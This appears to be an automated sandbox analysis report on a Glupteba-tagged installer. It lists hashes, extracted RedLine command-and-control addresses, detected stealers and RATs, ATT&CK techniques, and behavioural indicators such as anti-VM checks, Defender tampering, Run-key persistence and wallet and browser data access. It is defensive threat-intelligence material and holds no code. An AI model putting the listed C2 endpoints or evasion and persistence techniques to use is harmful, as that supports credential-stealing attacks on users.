glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (5).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

19.08

95.181.172.100:6795

Extracted

Family

redline

Botnet

dibild

135.148.139.222:33569

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

resource	yara_rule
behavioral27/memory/4568-371-0x00000000049C0000-0x00000000052E6000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5664	4972	rundll32.exe	24

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral27/memory/4804-292-0x0000000000000000-mapping.dmp	family_redline
behavioral27/memory/5000-303-0x0000000000000000-mapping.dmp	family_redline
behavioral27/memory/5000-307-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral27/memory/4804-297-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs

description	pid	Process	procid_target
PID 2872 created 3684	2872	WerFault.exe	90
PID 4056 created 2464	4056	WerFault.exe	80
PID 1020 created 3396	1020	WerFault.exe	111
PID 3216 created 3104	3216	WerFault.exe	93
PID 4844 created 968	4844	WerFault.exe	104
PID 1128 created 4576	1128	WerFault.exe	82
PID 2316 created 4568	2316	WerFault.exe	84
PID 5116 created 1296	5116	Esplorarne.exe.com	234
PID 6660 created 4996	6660	WerFault.exe	159
PID 5596 created 4704	5596	WerFault.exe	191
PID 6644 created 4676	6644	WerFault.exe	633
PID 864 created 1192	864	WerFault.exe	227
PID 5968 created 4000	5968	Esplorarne.exe.com	813
PID 6548 created 1684	6548	Esplorarne.exe.com	592
PID 2780 created 1068	2780	WerFault.exe	886
PID 3416 created 6856	3416	WerFault.exe	233
PID 1444 created 4720	1444	WerFault.exe	132
PID 6148 created 4916	6148	Esplorarne.exe.com	207
PID 8152 created 4456	8152	Esplorarne.exe.com	497

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral27/memory/2464-253-0x0000000004130000-0x00000000041CD000-memory.dmp	family_vidar
behavioral27/memory/1296-432-0x0000000004A30000-0x0000000004ACD000-memory.dmp	family_vidar

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	3377047_logo_media.exe

Executes dropped EXE 64 IoCs

pid	Process
2988	O5TjB46UfglGUEdrVFJnqcV8.exe
5036	bp6rLacE0rY6LNrjOO_TxmEr.exe
3060	gwyroycDer67hXuPDw56Y8dx.exe
3852	GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
4568	xmwrvdcY_Yfi3N5BkNTNaobs.exe
4584	NGSx7_M3OHWSeBxQFu9pEcYE.exe
4576	dfTxMY_IfJyT9BulZM6DJnA2.exe
4560	t7Xvr_mcY4U0EgrksDdHs2hI.exe
2464	DeXoDhHO4fs8ErAGxqZ46K2p.exe
2344	4TxEGrcFaLMUzJf7EnXhU_B_.exe
3896	BfG52BypxnLPuragVMr93q4y.exe
3104	W4sDxcb8D309KQCgTNmXJRUk.exe
3684	kWs5sSjR4k3xXHmO4XLag8d6.exe
4984	zT7lzmRyAz5Sh_dhGoZkPLf_.exe
1888	6dBlR9ES_h9uZiKUQGcURO6C.exe
3272	pIQ3ulIMRDHkTcxzXZA50m3y.exe
968	JReCxrSZ5O_Lnjfb2WaAEeOU.exe
3696	jooyu.exe
1068	DpLRG_KNuUytQZuMpgd6PuVG.exe
2256	md8_8eus.exe
3396	O5TjB46UfglGUEdrVFJnqcV8.exe
3368	customer3.exe
3108	DpLRG_KNuUytQZuMpgd6PuVG.tmp
4720	1480338.exe
4676	4175631.exe
4804	t7Xvr_mcY4U0EgrksDdHs2hI.exe
5000	NGSx7_M3OHWSeBxQFu9pEcYE.exe
3676	vdi_compiler.exe
2584	Conhost.exe
2800	5632698.exe
4720	1480338.exe
3232	2aSLfjkYYD2DshoQd7V_7CdH.exe
5036	11111.exe
1296	cmd.exe
2428	ultramediaburner.tmp
3604	Cleaner Installation.exe
1756	WEATHER Manager.exe
1300	VPN.exe
4160	md7_7dfj.exe
4996	askinstall53.exe
4140	MediaBurner2.exe
4644	VPN.tmp
3872	Inlog.tmp
3736	WEATHER Manager.tmp
4456	Cleaner.exe
5024	zhaoy-game.exe
4980	WinHoster.exe
1184	LivelyScreenRecS1.9.exe
3644	lDYC80QV081554Naoz9Vbsa4.exe
3268	MediaBurner2.tmp
5292	xtect12.exe
5756	Esplorarne.exe.com
6032	3377047_logo_media.exe
5164	Esplorarne.exe.com
5256	11111.exe
5584	6961886.exe
5912	7773517.exe
4040	1029648.exe
5432	1309205.exe
5564	3010462.exe
1276	tmp5871_tmp.exe
3032	msedge.exe
2112	HXce4NrG7u2T3ob0w0IpJDbM.exe
4704	vLMv9enxfOQSyOhkmUT9HBGQ.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral27/files/0x000700000002b1ff-285.dat	upx
behavioral27/files/0x000700000002b1ff-286.dat	upx

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	pIQ3ulIMRDHkTcxzXZA50m3y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4TxEGrcFaLMUzJf7EnXhU_B_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IOfzQKry13MDO41qVpDnSPol.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2aSLfjkYYD2DshoQd7V_7CdH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VI0TTJdNqDFHe87DIisPsVvC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	gwyroycDer67hXuPDw56Y8dx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	pIQ3ulIMRDHkTcxzXZA50m3y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4TxEGrcFaLMUzJf7EnXhU_B_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	QAkoadVPmpufjE2d8maWP2Qa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IOfzQKry13MDO41qVpDnSPol.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	gwyroycDer67hXuPDw56Y8dx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2aSLfjkYYD2DshoQd7V_7CdH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	QAkoadVPmpufjE2d8maWP2Qa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VI0TTJdNqDFHe87DIisPsVvC.exe

Loads dropped DLL 31 IoCs

pid	Process
3108	DpLRG_KNuUytQZuMpgd6PuVG.tmp
3108	DpLRG_KNuUytQZuMpgd6PuVG.tmp
3604	Cleaner Installation.exe
4404	rundll32.exe
3872	Inlog.tmp
3872	Inlog.tmp
4644	VPN.tmp
4644	VPN.tmp
3736	WEATHER Manager.tmp
3736	WEATHER Manager.tmp
3268	MediaBurner2.tmp
6212	Conhost.exe
7012	msedge.exe
7012	msedge.exe
1192	rundll32.exe
6984	GameBoxWin64.exe
6984	GameBoxWin64.exe
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
4092	Esplorarne.exe.com
7420	Setup.tmp
7188	MsiExec.exe
7188	MsiExec.exe
7360	Esplorarne.exe.com
7360	Esplorarne.exe.com
7360	Esplorarne.exe.com

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral27/files/0x000100000002b1c7-171.dat	themida
behavioral27/files/0x000100000002b1b5-163.dat	themida
behavioral27/files/0x000100000002b1ce-162.dat	themida
behavioral27/files/0x000100000002b1b5-195.dat	themida
behavioral27/files/0x000100000002b1ce-194.dat	themida
behavioral27/files/0x000100000002b1e1-186.dat	themida
behavioral27/files/0x000100000002b1e1-198.dat	themida
behavioral27/files/0x000100000002b1c7-202.dat	themida
behavioral27/memory/3852-231-0x00000000005B0000-0x00000000005B1000-memory.dmp	themida
behavioral27/memory/3060-243-0x0000000000BB0000-0x0000000000BB1000-memory.dmp	themida
behavioral27/memory/3272-251-0x00000000009B0000-0x00000000009B1000-memory.dmp	themida
behavioral27/memory/2344-257-0x00000000006B0000-0x00000000006B1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	Conhost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 9 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4TxEGrcFaLMUzJf7EnXhU_B_.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IOfzQKry13MDO41qVpDnSPol.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2aSLfjkYYD2DshoQd7V_7CdH.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VI0TTJdNqDFHe87DIisPsVvC.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gwyroycDer67hXuPDw56Y8dx.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	QAkoadVPmpufjE2d8maWP2Qa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	pIQ3ulIMRDHkTcxzXZA50m3y.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	Cleaner Installation.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\S:	Conhost.exe
File opened (read-only)	\??\X:	Conhost.exe
File opened (read-only)	\??\F:	Cleaner Installation.exe
File opened (read-only)	\??\K:	Conhost.exe
File opened (read-only)	\??\V:	Conhost.exe
File opened (read-only)	\??\L:	Cleaner Installation.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	Conhost.exe
File opened (read-only)	\??\R:	Cleaner Installation.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	Conhost.exe
File opened (read-only)	\??\O:	Conhost.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\T:	Conhost.exe
File opened (read-only)	\??\J:	Cleaner Installation.exe
File opened (read-only)	\??\O:	Cleaner Installation.exe
File opened (read-only)	\??\W:	Cleaner Installation.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\R:	Conhost.exe
File opened (read-only)	\??\H:	Cleaner Installation.exe
File opened (read-only)	\??\X:	Cleaner Installation.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\J:	Conhost.exe
File opened (read-only)	\??\I:	Cleaner Installation.exe
File opened (read-only)	\??\M:	Cleaner Installation.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	Conhost.exe
File opened (read-only)	\??\Q:	Conhost.exe
File opened (read-only)	\??\U:	Conhost.exe
File opened (read-only)	\??\S:	Cleaner Installation.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\L:	Conhost.exe
File opened (read-only)	\??\M:	Conhost.exe
File opened (read-only)	\??\T:	Cleaner Installation.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	Conhost.exe
File opened (read-only)	\??\W:	Conhost.exe
File opened (read-only)	\??\Z:	Conhost.exe
File opened (read-only)	\??\Q:	Cleaner Installation.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	Cleaner Installation.exe
File opened (read-only)	\??\V:	Cleaner Installation.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	Cleaner Installation.exe
File opened (read-only)	\??\N:	Cleaner Installation.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	Conhost.exe
File opened (read-only)	\??\A:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	Cleaner Installation.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	Conhost.exe
File opened (read-only)	\??\E:	Cleaner Installation.exe
File opened (read-only)	\??\K:	Cleaner Installation.exe
File opened (read-only)	\??\B:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
134	ipinfo.io
268	ipinfo.io
36	ip-api.com
101	ipinfo.io
27	ipinfo.io
140	ipinfo.io
146	ipinfo.io
155	ipinfo.io
225	ipinfo.io
235	ipinfo.io
2	ipinfo.io
3	ipinfo.io
287	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
3852	GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
3060	gwyroycDer67hXuPDw56Y8dx.exe
2344	4TxEGrcFaLMUzJf7EnXhU_B_.exe
3272	pIQ3ulIMRDHkTcxzXZA50m3y.exe
440	QAkoadVPmpufjE2d8maWP2Qa.exe
3876	IOfzQKry13MDO41qVpDnSPol.exe
1668	VI0TTJdNqDFHe87DIisPsVvC.exe
3232	2aSLfjkYYD2DshoQd7V_7CdH.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4560 set thread context of 4804	4560	t7Xvr_mcY4U0EgrksDdHs2hI.exe	118
PID 4584 set thread context of 5000	4584	NGSx7_M3OHWSeBxQFu9pEcYE.exe	117
PID 2112 set thread context of 7020	2112	HXce4NrG7u2T3ob0w0IpJDbM.exe	504
PID 5348 set thread context of 6852	5348	Esplorarne.exe.com	242
PID 5740 set thread context of 1684	5740	xXPw8gzq7kyFNlvwvOjz3cm1.exe	592

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-6DBNJ.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-QKKLD.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-D05OA.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-SFAK0.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-UCTKI.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-J1BI8.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EGLRI.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-E3NCT.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File created	C:\Program Files (x86)\INL Corpo Brovse\is-1VOL9.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-3D192.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File created	C:\Program Files (x86)\INL Corpo Brovse\is-614SN.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-88R6L.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-QMIT1.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-KDNHS.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-SFTGN.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll	Setup.tmp
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\unins000.dat	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-MGUMC.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-CTTFD.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	6dBlR9ES_h9uZiKUQGcURO6C.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\javaw.exe	Setup.tmp
File created	C:\Program Files (x86)\INL Corpo Brovse\unins000.dat	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-5LQF6.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-SOGAP.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-34SAC.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\INL Corpo Brovse\is-IGEIL.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-KQJ9I.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-ROUOF.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\libass.dll	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6VBA9.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	6dBlR9ES_h9uZiKUQGcURO6C.exe
File created	C:\Program Files (x86)\INL Corpo Brovse\is-FHAVU.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	6dBlR9ES_h9uZiKUQGcURO6C.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	2aSLfjkYYD2DshoQd7V_7CdH.exe
File created	C:\Program Files (x86)\MaskVPN\is-VPTAH.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\is-FAANM.tmp	Esplorarne.exe.com
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-7NA2S.tmp	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	Esplorarne.exe.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 28 IoCs

pid	pid_target	Process	procid_target
4744	3684	WerFault.exe	90
2528	3104	WerFault.exe	93
3392	968	WerFault.exe	104
2932	2464	WerFault.exe	80
1288	4568	WerFault.exe	84
3628	1296	WerFault.exe	147
6936	4996	WerFault.exe	159
6688	4704	WerFault.exe	191
5128	4676	WerFault.exe	136
6064	1192	WerFault.exe	227
448	4000	WerFault.exe	212
6420	1684	WerFault.exe	235
7544	4720	WerFault.exe	132
7536	6856	WerFault.exe	233
7460	4456	WerFault.exe	214
6972	5584	WerFault.exe	176
7108	5564	WerFault.exe	182
6264	6396	WerFault.exe	244
6352	3676	WerFault.exe	298
4612	3032	WerFault.exe	257
8152	5208	WerFault.exe	315
7524	6504	WerFault.exe	322
7580	5812	WerFault.exe	338
6584	5320	WerFault.exe	362
4004	3244	WerFault.exe	372
5832	6484	WerFault.exe	408
7184	6284	WerFault.exe	701
2800	2148	WerFault.exe	986

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A2MeOTLlVVy7eGu_Qu_gdUsq.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A2MeOTLlVVy7eGu_Qu_gdUsq.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A2MeOTLlVVy7eGu_Qu_gdUsq.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
